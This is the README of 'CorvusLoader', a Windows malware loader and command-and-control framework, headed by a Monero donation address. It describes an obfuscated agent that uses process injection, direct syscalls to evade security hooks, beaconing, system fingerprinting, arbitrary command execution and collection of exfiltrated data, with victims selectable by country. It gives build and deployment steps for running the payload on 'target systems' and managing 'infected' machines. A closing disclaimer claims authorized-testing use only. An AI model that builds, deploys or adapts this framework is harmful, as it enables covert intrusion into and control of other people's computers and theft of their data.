XMR - 85DxSo8AHVnXBnK74b3YerAF9TUayPUxRXSU9NNTdtyDJqKAaKReQ4UMqqjKeWrNwvDS16bLSW5yhRvDmyPRhMMZPc91T5Q
A Windows malware framework for command & control, process injection, and client management. Designed for idk people ig.
CorvusLoader is a malware distribution and control infrastructure consisting of three main components:
- Client - Obfuscated Windows agent that executes on target systems
- Builder - Automated compilation and obfuscation pipeline
- Server (C2 Panel) - Central command & control and client management interface
The framework provides endpoint deployment, task distribution, real-time monitoring, and command execution across distributed infected systems.
- String Encryption - Garble-based obfuscation of code strings
- Process Injection - Shellcode injection into legitimate processes
- Syscall Hashing - Direct syscall execution avoiding hooked APIs
- Path Obfuscation - Source code paths removed from binaries
- Automatic Beaconing - Periodic client check-ins to C2
- Geolocation - Automatic IP and ASN detection
- System Fingerprinting - CPU, GPU, antivirus, Windows version detection
- Hardware ID - Unique cross-platform HWID for client tracking
- Multi-endpoint Support - Failover support for multiple C2 servers
- Flexible Commands - Execute arbitrary commands on clients
- Targeted Filtering - Deploy to specific systems by country, CPU, GPU, OS
- Task Tracking - Monitor execution status and completion
- Result Collection - Gather command output and exfiltrated data
- Batch Operations - Target multiple systems simultaneously
- Intuitive Dashboard - Real-time client status visualization
- Admin Panel - Secure authentication and session management
- Client Profiles - Detailed system information per infected machine
- Task Management - Create and distribute commands
- Activity Logs - Complete audit trail of operations
1. Client (client/)
Infected endpoint agent that:
- Establishes C2 communication
- Collects system information
- Receives and executes commands
- Reports results back to server
Key files:
- client/client/main.go - Client entry and beacon logic
- client/client/commands.go - Command execution handlers
- client/injector/main.go - Process injection engine
Features:
- 15-second beacon interval (configurable)
- Multi-endpoint failover
- System-wide execution mutex (single instance)
2. Builder (client/builder/)
Automated compilation and obfuscation pipeline:
- Compiles client with garble encryption
- Converts binary to position-independent shellcode
- Embeds shellcode in injector binary
- Outputs final deployable payload
3. C2 Server (server/)
Central command & control infrastructure:
- Receives client beacons via HTTP
- Manages task distribution
- Maintains client database (SQLite)
- Web-based administration interface
Setup:
cd server
go build .Access: http://localhost:8080 (or remote IP address on network)
Edit client/client/main.go:
endpoints := []string{"http://your-c2-server:8080/"}(Use your C2 server's IP address or domain name)
cd client/builder
go build .
builder.exeOutput: build/corvus.exe
cd server
go build .
execute panel file
```localhost:8080/register` (or your server IP on network)
Register admin account at `http://your-server-ip:8080/register`
### 4. Deploy Payload
Execute `corvus.exe` on target systems. Clients will automatically beacon to C2 panel.
### 5. Manage Clients
Use web interface to:
- View connected clients
- Create and distribute tasks
- Monitor execution
- Collect results
## Security Features
### Obfuscation & Evasion
| Feature | Method | Benefit |
|---------|--------|---------|
| String Encryption | Garble | Hides command strings |
| Code Obfuscation | Garble | Confuses reverse engineering |
| Syscall Hashing | Direct syscalls | Evades API hooks |
| Process Injection | Process hollowing | Executes in clean context |
| Path Removal | Trimpath compilation | Removes source paths |
### Client Tracking
- **HWID** - Unique per system (hostname + IP + ASN)
- **Geolocation** - IP lookup via ip-api.com
- **Fingerprinting** - CPU, GPU, antivirus detection
- **Uptime** - System uptime monitoring
- **Status** - Online/offline tracking
### Task Management
- **Selective Targeting** - Filter by country, CPU, GPU, OS, HWID
- **Execution Limits** - Control task distribution counts
- **Status Tracking** - pending/executing/completed states
- **Unique IDs** - Task correlation and logging
## Documentation
- [Builder README](client/builder/README.md) - Build configuration and compilation
- [Injector README](client/injector/README.md) - Injection engine and evasion techniques
- [Server README](server/README.md) - C2 server setup and API documentation
- [Client Code](client/client/) - Agent implementation details
## Performance
Designed for enterprise-scale operations:
- **Database** - 100 concurrent connections, WAL mode
- **Concurrent Clients** - 1000+ simultaneous connections
- **Task Distribution** - Millisecond response times
- **Memory Footprint** - Minimal binary size with garble
- **Network** - Efficient JSON serialization
## Legal & Ethical
### Authorized Use Only
This framework is designed exclusively for:
- Authorized penetration testing
- Red team security assessments
- Defensive security research
- Licensed security professionals
## Troubleshooting
### Build Issues
See [Builder Documentation](client/builder/README.md#troubleshooting)
### Injection Failures
See [Injector Documentation](client/injector/README.md#troubleshooting)
### Server Problems
See [Server Documentation](server/README.md#troubleshooting)
## Project Structure
CorvusLoader/ ├── client/ # Client components │ ├── builder/ # Build automation │ ├── client/ # Agent code │ └── injector/ # Injection engine ├── server/ # C2 panel server │ ├── main.go │ ├── database/ │ ├── handlers/ │ ├── models/ │ ├── templates/ │ └── README.md └── README.md # This file
## Development
### Building from Source
```bash
# Install Go 1.21+
# Install garble: go install github.com/burrowers/garble@latest
# Clone repository
cd CorvusLoader/client/builder
go build .
Deploy in isolated lab environment with proper containment and monitoring.
This project is provided for educational and authorized testing purposes only. The author assumes no liability for misuse or damage caused by this software. Users are responsible for ensuring compliance with applicable laws and authorization requirements.